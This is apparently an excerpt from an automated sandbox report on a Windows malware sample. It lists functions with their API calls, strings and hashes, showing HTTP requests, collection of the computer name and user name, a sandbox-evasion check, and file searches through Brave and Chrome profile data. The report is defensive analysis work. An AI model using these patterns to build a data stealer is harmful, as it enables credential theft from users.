Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F

Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00750148), ref: 00406303
Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,007821A8,00000000,00000000,00400100,00000000), ref: 00406385
Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228

Strings

ERROR, xrefs: 0041521A
ERROR, xrefs: 00415273

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: d54b89ec47e5697ea434b70e160c2113ab88f323f7f5fb4d33c1f14eb2f801cc
Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
Opcode Fuzzy Hash: d54b89ec47e5697ea434b70e160c2113ab88f323f7f5fb4d33c1f14eb2f801cc
Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A

Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699

Function 0075329A Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007532C2
Module32First.KERNEL32(00000000,00000224), ref: 007532E2

Memory Dump Source

Source File: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Offset: 00751000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_751000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 5a5c316fe29a98059a6b55e4b3c102a164b2ea578db8340c8ee95dd7d304c511
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 1FF0F632200B146FD7203BF5A88DFAE76E8BF49762F100528EA46910D0DBB4ED0E4A61

Function 022A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,022A0223,?,?), ref: 022A0E19
SetErrorMode.KERNEL32(00000000,?,?,022A0223,?,?), ref: 022A0E1E

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5c546041dd4a2230b8c0bc4b7f8cb8fd575b4360faf6d49c853655059041b05f
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 69D01232255228B7DB002AD4DC09BCEBB1CDF09BA6F008021FB0DE9480CBB09A4046EA

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE

Function 00752F59 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00752FAA

Memory Dump Source

Source File: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Offset: 00751000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_751000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 8f756fdf406f526298a98ebe38cc7e86f61862d0e37673f35e2cd7af9186e654
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 4D113C79A00208FFDB01DF98C985E99BBF5AF08351F058094F9489B362D775EA54DF80

Non-executed Functions

Function 004138B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004138CC
FindFirstFileA.KERNEL32(?,?), ref: 004138E3
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
FindClose.KERNEL32(000000FF), ref: 00413C7C

Strings

%s%s, xrefs: 00413AAD
%s\%s, xrefs: 0041397A
!=A, xrefs: 00413C82, 00413C45, 00413B69, 00413909, 00413B6C, 00413C48
%s\%s, xrefs: 00413A6F
%s\*, xrefs: 004138C0
%s\%s\%s, xrefs: 00413A4A

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-817767981
Opcode ID: 4998a2a4828bb298670bae06159fd075eb3e5295b92b72b056a379b990e3da95
Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
Opcode Fuzzy Hash: 4998a2a4828bb298670bae06159fd075eb3e5295b92b72b056a379b990e3da95
Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66

Function 0040BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
FindClose.KERNEL32(000000FF), ref: 0040C7D1

Strings

Brave, xrefs: 0040C102
Google Chrome, xrefs: 0040C634
\Brave\Preferences, xrefs: 0040C1DB
Preferences, xrefs: 0040C11E

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 79f41c3d0d6c3761b6172f98091c4048338c044c777434d7ef4abedd42586b19
Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
Opcode Fuzzy Hash: 79f41c3d0d6c3761b6172f98091c4048338c044c777434d7ef4abedd42586b19
Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA

Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041492C
FindFirstFileA.KERNEL32(?,?), ref: 00414943
StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
FindClose.KERNEL32(000000FF), ref: 00414B92

Strings

%s\%s, xrefs: 004149FB
%s\*, xrefs: 00414920
%s\%s, xrefs: 004149A4

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 8b6f204cd57e663896ee5bd1383561da935646355c595d5eb662a7fca057069e
Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
Opcode Fuzzy Hash: 8b6f204cd57e663896ee5bd1383561da935646355c595d5eb662a7fca057069e
Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95

Function 022B3B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 022B3B33
FindFirstFileA.KERNEL32(?,?), ref: 022B3B4A
lstrcat.KERNEL32(?,?), ref: 022B3B9C
StrCmpCA.SHLWAPI(?,00420F70), ref: 022B3BAE
StrCmpCA.SHLWAPI(?,00420F74), ref: 022B3BC4
FindNextFileA.KERNEL32(000000FF,?), ref: 022B3ECE
FindClose.KERNEL32(000000FF), ref: 022B3EE3

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID:
API String ID: 1125553467-0
Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
Instruction ID: e8385845afe777881c6c2d0de7f9ce8508f67fe3b881a152a7c1f8046b30e495
Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
Instruction Fuzzy Hash: 5FA18EB5A50218ABDB35DFE4CC84FEE737ABF49300F044589A60D96144DB74AB84CF62

Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
HeapAlloc.KERNEL32(00000000), ref: 00414587
wsprintfA.USER32 ref: 004145A6
FindFirstFileA.KERNEL32(?,?), ref: 004145BD
StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
FindClose.KERNEL32(000000FF), ref: 004146A0
lstrcatA.KERNEL32(?,00750258,?,00000104), ref: 004146C5
lstrcatA.KERNEL32(?,00781B78), ref: 004146D8
lstrlenA.KERNEL32(?), ref: 004146E5
lstrlenA.KERNEL32(?), ref: 004146F6

Strings

%s\%s, xrefs: 0041461B
%s\*, xrefs: 0041459A

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: caf8461000e547f1530a018db9dd4cc2f00cb96c8f1fced345ef2e187e5a30a7
Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
Opcode Fuzzy Hash: caf8461000e547f1530a018db9dd4cc2f00cb96c8f1fced345ef2e187e5a30a7
Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96

Function 022B4B77 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 022B4B93
FindFirstFileA.KERNEL32(?,?), ref: 022B4BAA
StrCmpCA.SHLWAPI(?,00420FDC), ref: 022B4BD8
StrCmpCA.SHLWAPI(?,00420FE0), ref: 022B4BEE
FindNextFileA.KERNEL32(000000FF,?), ref: 022B4DE4
FindClose.KERNEL32(000000FF), ref: 022B4DF9

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
Instruction ID: d4900562ca4e65d8dbafdc15df7fb24cae1a49737de020905a93ae6515c80f57
Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
Instruction Fuzzy Hash: D16183B6950219ABCB20EFE0DD88FEA73BDFF49700F00458CA60992145EB75A785CF91

Function 022AC0D7 Relevance: 26.2, APIs: 17, Instructions: 675fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022AC15C
StrCmpCA.SHLWAPI(?,004213F8), ref: 022AC1B4
StrCmpCA.SHLWAPI(?,004213FC), ref: 022AC1CA
FindNextFileA.KERNEL32(000000FF,?), ref: 022ACA26
FindClose.KERNEL32(000000FF), ref: 022ACA38

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
Instruction ID: aff6453a3406da53a114b3124054e87eafad49fa950f6e8dac8fc6fd04508fa7
Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
Instruction Fuzzy Hash: 84427372A20304ABCB15FBF4DD95EED737AAF95340F40415DA50AA6188EF34AB48CF61

Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00413EC3
FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
FindClose.KERNEL32(000000FF), ref: 00414081

Strings

%s\%s, xrefs: 00413EB7

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: ee542d5114ce319572a734a5905d40e323a44990baf9728e3ccc04902c83c687
Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
Opcode Fuzzy Hash: ee542d5114ce319572a734a5905d40e323a44990baf9728e3ccc04902c83c687
Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95

Function 022B47D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022B47E7
RtlAllocateHeap.NTDLL(00000000), ref: 022B47EE
wsprintfA.USER32 ref: 022B480D
FindFirstFileA.KERNEL32(?,?), ref: 022B4824
StrCmpCA.SHLWAPI(?,00420FC4), ref: 022B4852
StrCmpCA.SHLWAPI(?,00420FC8), ref: 022B4868
FindNextFileA.KERNEL32(000000FF,?), ref: 022B48F2
FindClose.KERNEL32(000000FF), ref: 022B4907
lstrcat.KERNEL32(?,0064A524), ref: 022B492C
lstrcat.KERNEL32(?,0064A22C), ref: 022B493F
